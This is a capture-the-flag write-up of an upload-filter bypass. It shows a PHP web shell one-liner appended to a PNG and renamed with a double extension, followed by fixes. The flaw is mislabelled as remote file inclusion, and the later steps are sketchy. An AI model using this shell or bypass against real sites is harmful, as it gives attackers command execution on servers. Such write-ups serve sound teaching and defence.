Challenge: Agent RFI
Atish Kadam


VULNERABILITY

The site had a Remote File Inclusion (RFI) vulnerability combined with a flawed
file upload mechanism. The server was only checking if the filename ended with
".png" but wasn't validating anything beyond that — meaning you could upload a
PHP file disguised as an image just by naming it something like "image.png.php".
The actual file content was never checked either, so malicious PHP code could
be uploaded and executed on the server.


APPROACH / SOLUTION

The only place on the site where file uploads were possible was the profile
picture (avatar) section in user settings, so that's where I focused.

Step 1 - Testing what the server accepts:
I first tried uploading a plain PHP file. The server rejected it — it only
accepted PNG files. So I needed to find a way around that check.

Step 2 - Bypassing the file type check:
I renamed the file to "image.png.php" and uploaded it without changing anything
inside. It went through. This told me the server was only looking at the ".png"
part of the filename and not checking what came after it — or what was actually
inside the file.

Step 3 - Injecting PHP code into the image file:
Instead of creating a separate PHP file, I appended malicious PHP code directly
into a legitimate PNG file using the following command:

  echo '<?php system($_GET["cmd"]); ?>' >> image.png

This added a PHP web shell at the end of the image. I then renamed the file to
trick the server into treating it as a PHP file:

  mv image.png image.png.php

Then uploaded it to the profile picture section. The server accepted it because
the filename contained ".png".

Step 4 - Getting the result:
After uploading, the server executed the PHP code

Step 5 - Finding the flag:
I then searched for a user with the name "RFI" on the platform and found them.
Using their email, I logged into their account and found the flag in their bio.


MITIGATION / FIX

The core problem is that the server trusted the filename without properly
verifying what the file actually was. Here's how to fix it:

1. Validate file content, not just the name — check the actual file type using
   magic bytes or a proper library, not just what the filename says. A PHP file
   renamed to ".png" should be detected and rejected.

2. Strict extension checking — only allow a single, clean extension. A filename
   like "image.png.php" should immediately be flagged and rejected.

3. Never execute uploaded files — uploaded files should be stored in a location
   where the server cannot execute them, and they should never be treated as
   scripts under any circumstances.

4. Rename uploaded files — strip the original filename entirely and assign a
   random, safe name with the correct extension when saving to the server.